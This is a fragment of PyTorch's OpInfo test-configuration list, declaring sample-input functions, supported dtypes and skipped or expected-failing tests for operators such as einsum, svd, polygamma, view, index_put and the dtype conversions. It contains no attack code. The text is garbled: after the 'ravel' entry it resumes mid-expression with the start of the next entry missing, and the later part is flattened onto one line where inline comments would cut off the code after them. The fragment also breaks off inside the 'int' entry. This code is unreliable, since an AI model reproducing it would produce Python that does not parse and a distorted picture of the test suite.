               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit',
                            device_type='mps', dtypes=[torch.float32]),
           )
           ),
    OpInfo('eig',
           op=torch.eig,
           dtypes=floating_and_complex_types(),
           sample_inputs_func=sample_inputs_eig,
           error_inputs_func=error_inputs_eig,
           decorators=[
               skipCUDAIfNoMagma,
               skipCPUIfNoLapack,
           ],
           ),
    OpInfo('einsum',
           # we need this lambda because SampleInput expects tensor input as the first argument
           # TODO(@heitorschueroff) update SampleInput to handle such cases
           op=lambda tensors, equation: torch.einsum(equation, tensors),
           dtypes=all_types_and_complex_and(torch.bfloat16),
           dtypesIfCUDA=floating_and_complex_types_and(torch.half,
                                                       *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []),
           backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half,
                                                                *[torch.bfloat16]
                                                                if ((SM60OrLater and CUDA11OrLater)
                                                                    or TEST_WITH_ROCM) else []),
           supports_out=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           check_batched_forward_grad=False,  # See https://github.com/pytorch/pytorch/issues/66357
           sample_inputs_func=sample_inputs_einsum,
           skips=(
               DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),
               # test does not work with passing lambda for op
               # there's a test `test_einsum` in `test_jit.py` to handle this case
               # AssertionError: JIT Test does not execute any logic
               DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'),
           )),
    OpInfo('svd',
           op=torch.svd,
           dtypes=floating_and_complex_types(),
           sample_inputs_func=sample_inputs_svd,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           check_batched_forward_grad=False,
           # We're using at::allclose, which does not have a batching rule
           check_batched_grad=False,
           check_batched_gradgrad=False,
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off],
           skips=(
               # Fixme, forward over backward gives a numerical error
               DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad',
                            dtypes=(torch.complex128,)),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit',
                            device_type='mps', dtypes=[torch.float32]),
           )),
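    # with_tf32_off (decorating the SVD-family entries here) disables TF32 matmul kernels
    # on Ampere-class GPUs for the duration of the test, as I understand it, so float32
    # results are compared at full float32 precision rather than TF32 precision.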
    OpInfo('linalg.svd',
           op=torch.linalg.svd,
           aten_name='linalg_svd',
           dtypes=floating_and_complex_types(),
           supports_fwgrad_bwgrad=True,
           supports_forward_ad=True,
           check_batched_forward_grad=False,
           # We're using at::allclose, which does not have a batching rule
           check_batched_grad=False,
           check_batched_gradgrad=False,
           sample_inputs_func=sample_inputs_svd,
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off],
           skips=(
               # FIXME forward over backward gives a numerical error
               DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad',
                            dtypes=(torch.complex128,)),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit',
                            device_type='mps', dtypes=[torch.float32]),
           )),
    OpInfo('linalg.svdvals',
           op=torch.linalg.svdvals,
           aten_name='linalg_svdvals',
           dtypes=floating_and_complex_types(),
           check_batched_forward_grad=False,
           supports_fwgrad_bwgrad=True,
           supports_forward_ad=True,
           # We're using at::allclose, which does not have a batching rule
           check_batched_gradgrad=False,
           sample_inputs_func=sample_inputs_linalg_svdvals,
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off]),
    OpInfo('svd_lowrank',
           op=lambda *args, **kwargs: wrapper_set_seed(
               lambda a, b, **kwargs: torch.svd_lowrank(a @ b.mT, **kwargs),
               *args, **kwargs
           ),
           dtypes=floating_types(),
           supports_out=False,
           check_batched_grad=False,
           check_batched_gradgrad=False,
           check_batched_forward_grad=False,
           supports_fwgrad_bwgrad=True,
           supports_forward_ad=True,
           sample_inputs_func=sample_inputs_svd_lowrank,
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off,
                       DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-03, rtol=1e-03)}),
                                    'TestCommon', 'test_noncontiguous_samples',
                                    device_type='cuda')],
           skips=(
               # test does not work with passing lambda for op
               DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"),
               DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),
           )),
    OpInfo('pca_lowrank',
           op=lambda *args, **kwargs: wrapper_set_seed(
               lambda a, b, **kwargs: torch.pca_lowrank(a @ b.mT, **kwargs),
               *args, **kwargs
           ),
           dtypes=floating_types(),
           supports_out=False,
           check_batched_forward_grad=False,
           check_batched_grad=False,
           check_batched_gradgrad=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           sample_inputs_func=sample_inputs_pca_lowrank,
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off,
                       DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-03, rtol=1e-03)}),
                                    'TestCommon', 'test_noncontiguous_samples',
                                    device_type='cuda')],
           skips=(
               # test does not work with passing lambda for op
               DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"),
               DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),
           )),
    BinaryUfuncInfo('polar',
                    dtypes=floating_types(),
                    # this function is undefined if 'abs' values are <0
                    supports_forward_ad=True,
                    lhs_make_tensor_kwargs=dict(low=0),
                    supports_rhs_python_scalar=False,
                    skips=(
                        # RuntimeError: Expected object of scalar type Float but got scalar type Double for second argument
                        DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs', 'test_type_promotion'),
                        # GradcheckError: Jacobian computed with forward mode mismatch for output 0 with respect to input 0
                        # Numerical:
                        #  tensor([[0.]], dtype=torch.float64)
                        # Analytical:
                        # tensor([[-0.0047]], dtype=torch.float64, grad_fn=<CopySlices>)
                        DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'),
                    )),
    # TODO(@kshitij12345): Refactor similar to `mvlgamma` entries.
    # To test reference numerics against multiple values of argument `n`,
    # we make multiple OpInfo entries with each entry corresponding to different value of n (currently 0 to 4).
    # We run the op tests from test_ops.py only for `n=0` to avoid redundancy in testing.
    UnaryUfuncInfo('polygamma',
                   op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs),
                   variant_test_name='polygamma_n_0',
                   ref=reference_polygamma if TEST_SCIPY else _NOTHING,
                   dtypes=all_types_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and(torch.bool, torch.half),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   sample_inputs_func=sample_inputs_polygamma,
                   skips=(
                       DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"),
                   ),
                   sample_kwargs=lambda device, dtype, input: ({'n': 0}, {'n': 0})),
    # A separate OpInfo entry for special.polygamma is needed to reorder the arguments
    # for the alias. See the discussion here: https://github.com/pytorch/pytorch/pull/59691#discussion_r650261939
    UnaryUfuncInfo('special.polygamma',
                   op=lambda x, n, **kwargs: torch.special.polygamma(n, x, **kwargs),
                   variant_test_name='special_polygamma_n_0',
                   ref=reference_polygamma if TEST_SCIPY else _NOTHING,
                   dtypes=all_types_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and(torch.bool, torch.half),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   sample_inputs_func=sample_inputs_polygamma,
                   skips=(
                       # lambda impl
                       DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),
                       DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"),
                   ),
                   sample_kwargs=lambda device, dtype, input: ({'n': 0}, {'n': 0}),
                   # polygamma functions have multiple singularities at x <= 0
                   reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)),
    UnaryUfuncInfo('polygamma',
                   op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs),
                   variant_test_name='polygamma_n_1',
                   ref=reference_polygamma if TEST_SCIPY else _NOTHING,
                   dtypes=all_types_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and(torch.bool, torch.half),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   sample_inputs_func=sample_inputs_polygamma,
                   skips=(
                       # Redundant tests
                       DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestJit'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'),
                       # Mismatch: https://github.com/pytorch/pytorch/issues/55357
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large'),
                   ),
                   sample_kwargs=lambda device, dtype, input: ({'n': 1}, {'n': 1}),
                   # polygamma functions have multiple singularities at x <= 0
                   reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)),
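    # Reminder on the sample_kwargs convention used by these polygamma variants: the
    # lambda returns (torch kwargs, reference-fn kwargs); both are {'n': k} here since
    # the scipy-backed reference takes the same `n` argument.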
    UnaryUfuncInfo('polygamma',
                   op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs),
                   variant_test_name='polygamma_n_2',
                   ref=reference_polygamma if TEST_SCIPY else _NOTHING,
                   dtypes=all_types_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and(torch.bool, torch.half),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   sample_inputs_func=sample_inputs_polygamma,
                   skips=(
                       # Redundant tests
                       DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestJit'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'),
                       # Mismatch: https://github.com/pytorch/pytorch/issues/55357
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    active_if=TEST_WITH_ROCM),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small',
                                    active_if=TEST_WITH_ROCM),),
                   sample_kwargs=lambda device, dtype, input: ({'n': 2}, {'n': 2}),
                   # polygamma functions have multiple singularities at x <= 0
                   reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)),
    UnaryUfuncInfo('polygamma',
                   op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs),
                   variant_test_name='polygamma_n_3',
                   ref=reference_polygamma if TEST_SCIPY else _NOTHING,
                   dtypes=all_types_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and(torch.bool, torch.half),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   sample_inputs_func=sample_inputs_polygamma,
                   skips=(
                       # Redundant tests
                       DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestJit'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'),
                       # Mismatch: https://github.com/pytorch/pytorch/issues/55357
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'),),
                   sample_kwargs=lambda device, dtype, input: ({'n': 3}, {'n': 3}),
                   # polygamma functions have multiple singularities at x <= 0
                   reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)),
    UnaryUfuncInfo('polygamma',
                   op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs),
                   variant_test_name='polygamma_n_4',
                   ref=reference_polygamma if TEST_SCIPY else _NOTHING,
                   decorators=(precisionOverride({torch.float16: 5e-4, torch.float32: 5e-4}),),
                   dtypes=all_types_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and(torch.bool, torch.half),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   sample_inputs_func=sample_inputs_polygamma,
                   skips=(
                       # Redundant tests
                       DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestJit'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'),
                       # Mismatch: https://github.com/pytorch/pytorch/issues/55357
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    active_if=TEST_WITH_ROCM),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small',
                                    active_if=TEST_WITH_ROCM),),
                   sample_kwargs=lambda device, dtype, input: ({'n': 4}, {'n': 4}),
                   # polygamma functions have multiple singularities at x <= 0
                   reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)),
    OpInfo('ravel',
           ref=np.ravel,
           dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf),
           supports_out=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           sample_inputs_func=sample_inputs_ravel,
           ),
torch.bfloat16, torch.chalf), sample_inputs_func=partial(sample_inputs_view_reshape, transpose_samples=True), reference_inputs_func=partial(reference_inputs_view_reshape, transpose_samples=True), error_inputs_func=error_inputs_reshape, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('reshape_as', op=lambda x, other: x.reshape_as(other), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_view_as_reshape_as, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('view', op=lambda x, shape: x.view(shape), dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, sample_inputs_func=partial(sample_inputs_view_reshape, transpose_samples=False), reference_inputs_func=partial(reference_inputs_view_reshape, transpose_samples=False), skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('view_as', op=lambda x, other: x.view_as(other), dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_view_as_reshape_as, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('atleast_1d', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_atleast1d2d3d, skips=( # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. 
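# For context: atleast_1d accepts a variable number of tensors, e.g.
#   torch.atleast_1d(torch.tensor(1.), torch.tensor(2.))  # -> tuple of 1-D tensors
# and that variadic signature is what the JIT check described above trips over.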
DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), ), OpInfo('atleast_2d', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), sample_inputs_func=sample_inputs_atleast1d2d3d, ), OpInfo('atleast_3d', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), sample_inputs_func=sample_inputs_atleast1d2d3d, ), OpInfo('flatten', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_flatten, reference_inputs_func=reference_inputs_flatten, ), OpInfo('column_stack', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"),), sample_inputs_func=sample_inputs_column_stack,), OpInfo('pinverse', op=torch.pinverse, dtypes=floating_and_complex_types(), check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False, sample_inputs_func=sample_inputs_linalg_invertible, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('gather', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_gather, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_forward_ad=True, supports_fwgrad_bwgrad=True, error_inputs_func=error_inputs_gather, ), OpInfo('index_fill', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_index), OpInfo('index_copy', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( ), sample_inputs_func=sample_inputs_index, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('index_select', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_index, 
error_inputs_func=error_inputs_index_select, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('index_add', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_index, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('index_reduce', dtypes=floating_types_and(torch.float16, torch.bfloat16), supports_out=True, sample_inputs_func=sample_inputs_index_reduce), OpInfo('__getitem__', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_inplace_autograd=False, supports_scripting=False, op=torch.Tensor.__getitem__, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: False is not true : Scalars failed to compare as equal! 0 != 104448 DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='cuda'),), sample_inputs_func=sample_inputs_getitem), OpInfo('index_put', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_inplace_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, test_neg_view=False, sample_inputs_func=sample_inputs_index_put, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: The following operation failed in the TorchScript interpreter. # Traceback of TorchScript (most recent call last): # File "<string>", line 3, in forward # def the_method(i0, i1: List[torch.Tensor], i2): # return torch.index_put(i0, i1, i2, accumulate=False) # ~~~~~~~~~~~~~~~ <--- HERE # RuntimeError: a leaf Variable that requires grad is being used in an in-place operation. 
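# For reference, torch.index_put is the out-of-place form of Tensor.index_put_;
# with accumulate=False it behaves roughly like
#   out = x.clone(); out[indices] = values
# and with accumulate=True the values are added rather than assigned.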
DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('sort', dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_sort, supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo('unique', dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.float16), sample_inputs_func=sample_inputs_unique, supports_out=False, supports_autograd=False, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # 76571 DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values', dtypes=(torch.float16, torch.float32, torch.float64)), )), OpInfo('unique_consecutive', dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.float16), sample_inputs_func=sample_inputs_unique_consecutive, supports_out=False, supports_autograd=False, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # 76571 DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values', dtypes=(torch.float16, torch.float32, torch.float64)), )), OpInfo('put', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, check_batched_gradgrad=False, # vmap complains of the sizes skips=( # Problem, needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ), sample_inputs_func=sample_inputs_put), OpInfo('take', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), check_batched_grad=False, # vmap complains of the sizes supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_take, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), ), error_inputs_func=error_inputs_take), OpInfo('scatter', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_scatter, error_inputs_func=error_inputs_scatter_and_scatter_add), OpInfo('bfloat16', op=lambda x, *args, **kwargs: x.bfloat16(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), )), OpInfo('bool', op=lambda x, *args, **kwargs: x.bool(*args, 
**kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # 76047 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.int8,)), )), OpInfo('byte', op=lambda x, *args, **kwargs: x.byte(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, # The autograd test runner cannot handle functions that change dtype supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('char', op=lambda x, *args, **kwargs: x.char(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, # The autograd test runner cannot handle functions that change dtype supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('double', op=lambda x, *args, **kwargs: x.double(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('float', op=lambda x, *args, **kwargs: x.float(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('half', op=lambda x, *args, **kwargs: x.half(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=True, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('int', op=lambda x, *args, **kwargs: x.int(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, 
